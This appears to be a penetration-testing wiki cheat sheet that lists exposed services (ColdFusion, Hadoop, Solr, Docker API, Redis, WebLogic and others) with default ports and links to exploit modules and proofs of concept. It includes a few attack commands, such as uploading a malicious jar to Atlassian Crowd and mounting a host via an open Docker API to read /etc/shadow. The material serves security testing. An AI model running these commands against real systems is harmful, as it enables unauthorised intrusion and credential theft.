# Low-Hanging Fruit

## Services

### Adobe ColdFusion BlazeDS

**Ports:** 8080\
**Exploit:**

{% embed url="<https://www.tenable.com/plugins/nessus/99731>" %}

{% embed url="<https://www.exploit-db.com/exploits/43993>" %}

### Apache Flink

**Ports:** 5000\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/http/apache_flink_jar_upload_exec>" %}

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/apache_flink_jobmanager_traversal>" %}

{% embed url="<https://www.exploit-db.com/exploits/48978>" %}

### Apache Hadoop

**Ports:** 8088\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/http/hadoop_unauth_exec>" %}

{% embed url="<https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py>" %}

### Apache Solr

**Ports:** 8983\
**Exploit:**

{% embed url="<https://github.com/jas502n/solr_rce>" %}

{% embed url="<https://github.com/Imanfeng/Apache-Solr-RCE>" %}

### Apache Spark

**Ports:** 6066\
**Exploit:**

{% embed url="<https://github.com/ivanitlearning/CVE-2018-11770>" %}

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/http/spark_unauth_rce>" %}

### Atlassian Crowd

**Ports:** 4990\
**Exploit:**

```bash
curl -k -H "Content-Type: multipart/mixed" \ --form "file_cdl=@rce.jar" http://[HOST]:4990/crowd/admin/uploadplugin.action
```

{% embed url="<https://packetstormsecurity.com/files/163810/Atlassian-Crowd-pdkinstall-Remote-Code-Execution.html>" %}

### Cisco Smart Install

**Ports:** 4786\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/misc/cisco_smart_install>" %}

{% embed url="<https://github.com/frostbits-security/SIET>" %}

### Cisco Unified Communications Manager

**Ports:** 6970\
**Exploit:**

```bash
curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt
```

{% embed url="<https://github.com/trustedsec/SeeYouCM-Thief>" %}

### Dameware

**Ports:** 6129\
**Exploit:**

{% embed url="<https://www.tenable.com/security/research/tra-2019-43>" %}

{% embed url="<https://github.com/tenable/poc/blob/master/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py>" %}

### Dell iDrac&#x20;

**Ports:** 443

**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/dell_idrac>" %}

### Docker API

**Ports:** 2375\
**Exploit:**

```bash
docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
```

* File Access: `cat /mnt/etc/shadow`
* Remote Code Execution: `chroot /mnt`

### GlassFish

**Ports:** 4848\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/glassfish_traversal>" %}

### Hashicorp Consul

**Ports:** 8500\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/consul_service_exec>" %}

### HP Data Protector

**Ports:** 5555, 5556\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/hp_data_protector_exec_integutil>" %}

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/misc/hp_dataprotector_cmd_exec>" %}

### HP iLO

**Ports:** 80, 443

**Exploit:**

{% embed url="<https://github.com/skelsec/CVE-2017-12542/blob/master/exploit_1.py>" %}

### IBM Websphere

**Ports:** 8880\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/misc/ibm_websphere_java_deserialize>" %}

### IPMI

**Ports:** 623\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_version>" %}

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_dumphashes>" %}

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/ipmi/ipmi_cipher_zero>" %}

### Java RMI

**Ports:** 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server>" %}

{% embed url="<https://itnext.io/java-rmi-for-pentesters-structure-recon-and-communication-non-jmx-registries-a10d5c996a79>" %}

{% embed url="<https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314d>" %}

### JBoss

**Ports:** 4444, 4445, 11111\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/auxiliary/scanner/http/jboss_vulnscan>" %}

{% embed url="<https://github.com/joaomatosf/jexboss>" %}

### JDWP

**Ports:** 5005 - 5009, 45000, 45001\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/java_jdwp_debugger>" %}

{% embed url="<https://github.com/IOActive/jdwp-shellifier>" %}

### JMX

**Ports:** 8686, 9012, 50500\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/multi/misc/java_jmx_server>" %}

### MS17-010: Eternal Blue

**Ports** 139, 445

**Exploit:**

```bash
nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip 
```

{% embed url="<https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/>" %}

### Portainer

**Ports:** 9000\
**Exploit:**

{% embed url="<https://github.com/MauroEldritch/PAZUZU>" %}

{% embed url="<https://github.com/MauroEldritch/lempo>" %}

### PrintNightmare

```bash
crackmapexec smb $host_file -u $username -p $password -M spooler
```

{% embed url="<https://github.com/cube0x0/CVE-2021-1675>" %}

### Redis

**Ports:** 6379\
**Exploit:**

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/redis/redis_replication_cmd_exec>" %}

{% embed url="<https://www.rapid7.com/db/modules/exploit/linux/redis/redis_unauth_exec>" %}

### SAP

**Ports:** 3300\
**Exploit:**

{% embed url="<https://github.com/chipik/SAP_GW_RCE_exploit>" %}

### WebLogic

**Ports:** 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503\
**Exploit:**

{% embed url="<https://www.exploit-db.com/search?q=weblogic>" %}

### Zoho Manageengine Desktop

**Ports:** 8383\
**Exploit:**

{% embed url="<https://srcincite.io/pocs/src-2020-0011.py.txt>" %}

### References

{% embed url="<https://github.com/trustedsec/spoonmap>" %}

{% embed url="<https://twitter.com/ptswarm/status/1354417582070247426>" %}